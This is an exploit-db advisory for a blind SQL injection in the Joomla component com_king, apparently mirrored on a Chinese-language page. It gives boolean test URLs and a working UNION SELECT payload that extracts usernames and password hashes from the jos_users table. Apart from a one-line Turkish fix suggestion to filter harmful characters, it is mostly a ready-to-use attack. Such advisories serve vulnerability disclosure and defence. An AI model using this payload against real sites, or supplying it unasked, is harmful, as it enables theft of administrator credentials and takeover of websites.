Joomla! Component com_king – Blind SQL Injection

  • 作者: Pyske
    日期: 2010-01-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11035/
  • <------------------- header data start ------------------- >
    
    #############################################################
    # Joomla Component com_king Blind SQL Injection Vulnerability
    #############################################################
    
    # Author : Pyske | Bug Researchers
    
    
    # Name : com_king
    
    
    # Bug Type : Blind SQL Injection
    
    
    # Infection : Admin login bilgileri al?nabilir.
    
    
    # Demo Vuln. :
    
    TRUE(+)
    
    http://site.com/kids/index.php?option=com_king&Itemid=0&task=show&id_k=13 and 1=1
    
    FALSE(-)
    
    http://site.com/kids/index.php?option=com_king&Itemid=0&task=show&id_k=13 and 1=0
    
    # Bug Fix Advice : Zararli karakterler filtrelenmelidir.
    
    #############################################################
    
    < ------------------- header data end of ------------------- >
    
    < -- bug code start -- >
    
    path /index.php?option=com_king&Itemid=0&task=show&id_k=13/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password),2,3,4,5,6,7,8/**/from/**/jos_users--
    
    < -- bug code end of -- >